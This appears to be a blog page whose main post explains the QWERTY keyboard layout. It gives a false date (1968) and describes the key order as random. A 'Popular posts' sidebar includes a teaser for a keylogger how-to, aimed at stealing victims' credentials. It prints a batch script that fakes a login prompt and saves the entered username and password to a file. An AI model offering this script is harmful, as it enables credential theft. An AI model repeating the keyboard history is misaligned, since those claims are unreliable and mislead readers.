Skip to main content

Why Do We Have QWERTY Keyboard, Not ABCDE?

Why Do We Have QWERTY Keyboard, Not ABCDE?


In electronic devices, there are several types of keyboards among which stand out the standard PC type keyboards. Yes, we are talking about the ones we use when using a computer. Out of all others, QWERTY is the most popular and common.
  • However, have you ever wondered what motivates the order of computer keyboard letters? For this arrangement, known as QWERTY. So, if you are looking for the answer why our computer keyboard letters arranged as QWERTY instead of ABCDE then here we are going to share a reasonable answer. 
  • As we already mentioned, there are lots of keyboards made for computers that use different dimensions and arrangement of keys. However, QWERTY is the most common one. 
  • It was designed around 1968 and has the peculiarity that its name (QWERTY) is the first six letters of its upper row of keys. 
  • The reason dates back to the time where people used typewriters. When the typewriter was first invented, they had the key arranged in an alphabetical order. However, because of ABCD, people typed so fast that the mechanical characters arms got tangled up. 
  • Therefore, the keys were randomly positioned as QWERTY which is meant to slow down the typing and prevent key jams. After the invention of QWERTY keyboards, the random arrangement became standard. 
  • However, now people are also habituated with QWERTY Keyboard. So, this is the reason why your keyboard is not arranged in alphabetical order. 
 Hope you like the post, share it as much as possible.


Comments

Popular posts from this blog

A beginner’s guide to the dark web

What is the dark web? There are basically three parts to the world wide web: surface web, deep web, and dark web. The surface web is everything that’s publicly available and accessible through search or typing a URL into your browser. The deep web , also known as the invisible web, is all the content on the web that is not indexed by standard search engines, such as email clients, online banking websites, or pages that are inaccessible to crawlers, the software that indexes the web for search engines. Some of those pages can still be accessed if you have the URL while others require you to have login credentials. According to expert estimates, the deep web is 500 times larger than the surface web. The dark web, however, is a totally different beast—a tiny fraction of the web that is only accessible through specialized software such as the Tor browser. However, the term “dark web” is also often used to refer to the darknet, the overlay networks that are used to an...

How to Create a key-logger?

The key-logger is one of the oldest tools in the world of hacking, but despite this, it is still effective. Next ,i'm going to show you how to create key-logger in a simple way, using notepad. What is Key-logger?  A key-logger is a type of spyware that records all keystrokes on victims computer secretly. Key-logger are widely used by cyber-criminals to obtain information on bank accounts and credit cards, data such as usernames, passwords, and other personal information . HOW TO MAKE A KEY-LOGGER?  Here is a basic key-logger script for beginners to understand the basics of how key-logging works in notepad. Open notepad on your Windows and paste the script given below. @echo off  color a title Login cls echo Please Enter Your Email Address and Password echo. echo. cd C:\Logs set /p user= Username: set /p pass=Password: echo Username="%user%" Password="%pass%" Log.txt start http://TechiViewer.com/ exit ...

WHAT IS A VPN IS ALL ABOUT?

What is a VPN? A VPN creates a secure, encrypted “tunnel” over the internet between your computer, smartphone or tablet and whatever website or app you are trying to access. This is made possible by redirecting your connection via a VPN server in another country, which makes it appear to a website or application that you are just another ‘local’ visitor. You become effectively anonymous as your IP address (the numerical label that identifies your device’s online connection) is replaced with that of the VPN server. All you need in order to do this is a VPN app on your device and an affordable subscription. The best VPNs work across laptops, desktops, smartphones and tablets – even a Smart TV, with the aid of an ethernet cable or a Chromecast dongle. When you want to mask your real location, simply launch the VPN app, select the country from which you want to connect then off you go! After that, simply use your browser and any apps as you would normally do. How do I conn...